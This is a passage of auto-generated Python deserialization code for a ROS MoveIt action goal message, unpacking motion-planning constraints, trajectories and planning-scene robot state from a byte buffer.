(length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v478 = val2.target_pose _v479 = _v478.header start = end end += 4 (_v479.seq,) = _get_struct_I().unpack(str[start:end]) _v480 = _v479.stamp _x = _v480 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v479.frame_id = str[start:end].decode('utf-8') else: _v479.frame_id = str[start:end] _v481 = _v478.pose _v482 = _v481.position _x = _v482 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v483 = _v481.orientation _x = _v483 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v484 = val2.sensor_pose _v485 = _v484.header start = end end += 4 (_v485.seq,) = _get_struct_I().unpack(str[start:end]) _v486 = _v485.stamp _x = _v486 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v485.frame_id = str[start:end].decode('utf-8') else: _v485.frame_id = str[start:end] _v487 = _v484.pose _v488 = _v487.position _x = _v488 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v489 = _v487.orientation _x = _v489 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.goal_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.path_constraints.name = str[start:end].decode('utf-8') else: self.goal.request.path_constraints.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.joint_name = str[start:end].decode('utf-8') else: val1.joint_name = str[start:end] _x = val1 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.position_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.PositionConstraint() _v490 = val1.header start = end end += 4 (_v490.seq,) = _get_struct_I().unpack(str[start:end]) _v491 = _v490.stamp _x = _v491 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v490.frame_id = str[start:end].decode('utf-8') else: _v490.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v492 = val1.target_point_offset _x = _v492 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v493 = val1.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v493.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v494 = val3.position _x = _v494 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v495 = val3.orientation _x = _v495 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v493.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v493.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v496 = val3.position _x = _v496 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v497 = val3.orientation _x = _v497 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v493.mesh_poses.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.path_constraints.position_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.OrientationConstraint() _v498 = val1.header start = end end += 4 (_v498.seq,) = _get_struct_I().unpack(str[start:end]) _v499 = _v498.stamp _x = _v499 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v498.frame_id = str[start:end].decode('utf-8') else: _v498.frame_id = str[start:end] _v500 = val1.orientation _x = _v500 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _x = val1 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val1.target_radius,) = _get_struct_d().unpack(str[start:end]) _v501 = val1.target_pose _v502 = _v501.header start = end end += 4 (_v502.seq,) = _get_struct_I().unpack(str[start:end]) _v503 = _v502.stamp _x = _v503 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v502.frame_id = str[start:end].decode('utf-8') else: _v502.frame_id = str[start:end] _v504 = _v501.pose _v505 = _v504.position _x = _v505 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v506 = _v504.orientation _x = _v506 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val1.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v507 = val1.sensor_pose _v508 = _v507.header start = end end += 4 (_v508.seq,) = _get_struct_I().unpack(str[start:end]) _v509 = _v508.stamp _x = _v509 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v508.frame_id = str[start:end].decode('utf-8') else: _v508.frame_id = str[start:end] _v510 = _v507.pose _v511 = _v510.position _x = _v511 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v512 = _v510.orientation _x = _v512 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val1 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.trajectory_constraints.constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v513 = val2.header start = end end += 4 (_v513.seq,) = _get_struct_I().unpack(str[start:end]) _v514 = _v513.stamp _x = _v514 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v513.frame_id = str[start:end].decode('utf-8') else: _v513.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v515 = val2.target_point_offset _x = _v515 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v516 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v516.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v517 = val4.position _x = _v517 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v518 = val4.orientation _x = _v518 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v516.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v516.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v519 = val4.position _x = _v519 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v520 = val4.orientation _x = _v520 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v516.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v521 = val2.header start = end end += 4 (_v521.seq,) = _get_struct_I().unpack(str[start:end]) _v522 = _v521.stamp _x = _v522 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v521.frame_id = str[start:end].decode('utf-8') else: _v521.frame_id = str[start:end] _v523 = val2.orientation _x = _v523 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v524 = val2.target_pose _v525 = _v524.header start = end end += 4 (_v525.seq,) = _get_struct_I().unpack(str[start:end]) _v526 = _v525.stamp _x = _v526 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v525.frame_id = str[start:end].decode('utf-8') else: _v525.frame_id = str[start:end] _v527 = _v524.pose _v528 = _v527.position _x = _v528 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v529 = _v527.orientation _x = _v529 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v530 = val2.sensor_pose _v531 = _v530.header start = end end += 4 (_v531.seq,) = _get_struct_I().unpack(str[start:end]) _v532 = _v531.stamp _x = _v532 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v531.frame_id = str[start:end].decode('utf-8') else: _v531.frame_id = str[start:end] _v533 = _v530.pose _v534 = _v533.position _x = _v534 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v535 = _v533.orientation _x = _v535 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.trajectory_constraints.constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.reference_trajectories = [] for i in range(0, length): val1 = moveit_msgs.msg.GenericTrajectory() _v536 = val1.header start = end end += 4 (_v536.seq,) = _get_struct_I().unpack(str[start:end]) _v537 = _v536.stamp _x = _v537 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v536.frame_id = str[start:end].decode('utf-8') else: _v536.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_trajectory = [] for i in range(0, length): val2 = trajectory_msgs.msg.JointTrajectory() _v538 = val2.header start = end end += 4 (_v538.seq,) = _get_struct_I().unpack(str[start:end]) _v539 = _v538.stamp _x = _v539 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v538.frame_id = str[start:end].decode('utf-8') else: _v538.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] val2.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v540 = val3.time_from_start _x = _v540 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.joint_trajectory.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.cartesian_trajectory = [] for i in range(0, length): val2 = moveit_msgs.msg.CartesianTrajectory() _v541 = val2.header start = end end += 4 (_v541.seq,) = _get_struct_I().unpack(str[start:end]) _v542 = _v541.stamp _x = _v542 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v541.frame_id = str[start:end].decode('utf-8') else: _v541.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.tracked_frame = str[start:end].decode('utf-8') else: val2.tracked_frame = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = moveit_msgs.msg.CartesianTrajectoryPoint() _v543 = val3.point _v544 = _v543.pose _v545 = _v544.position _x = _v545 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v546 = _v544.orientation _x = _v546 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v547 = _v543.velocity _v548 = _v547.linear _x = _v548 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v549 = _v547.angular _x = _v549 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v550 = _v543.acceleration _v551 = _v550.linear _x = _v551 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v552 = _v550.angular _x = _v552 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v553 = val3.time_from_start _x = _v553 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.cartesian_trajectory.append(val2) self.goal.request.reference_trajectories.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.planner_id = str[start:end].decode('utf-8') else: self.goal.request.planner_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.group_name = str[start:end].decode('utf-8') else: self.goal.request.group_name = str[start:end] _x = self start = end end += 28 (_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor,) = _get_struct_i3d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.name = str[start:end] _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v554 = val1.translation _x = _v554 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v555 = val1.rotation _x = _v555 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v556 = val1.linear _x = _v556 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v557 = val1.angular _x = _v557 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v558 = val1.force _x = _v558 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v559 = val1.torque _x = _v559 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v560 = val1.object _v561 = _v560.header start = end end += 4 (_v561.seq,) = _get_struct_I().unpack(str[start:end]) _v562 = _v561.stamp _x = _v562 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v561.frame_id = str[start:end].decode('utf-8') else: _v561.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v560.id = str[start:end].decode('utf-8') else: _v560.id = str[start:end] _v563 = _v560.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v563.key = str[start:end].decode('utf-8') else: _v563.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v563.db = str[start:end].decode('utf-8') else: _v563.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v560.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v564 = val3.position _x = _v564 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v565 = val3.orientation _x = _v565 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v560.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v566 = val3.position _x = _v566 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v567 = val3.orientation _x = _v567 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4) _v560.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v568 = val3.position _x = _v568 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v569 = val3.orientation _x = _v569 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v560.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v570 = val3.position _x = _v570 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v571 = val3.orientation _x = _v571 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.subframe_poses.append(val3) start = end end += 1 (_v560.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = 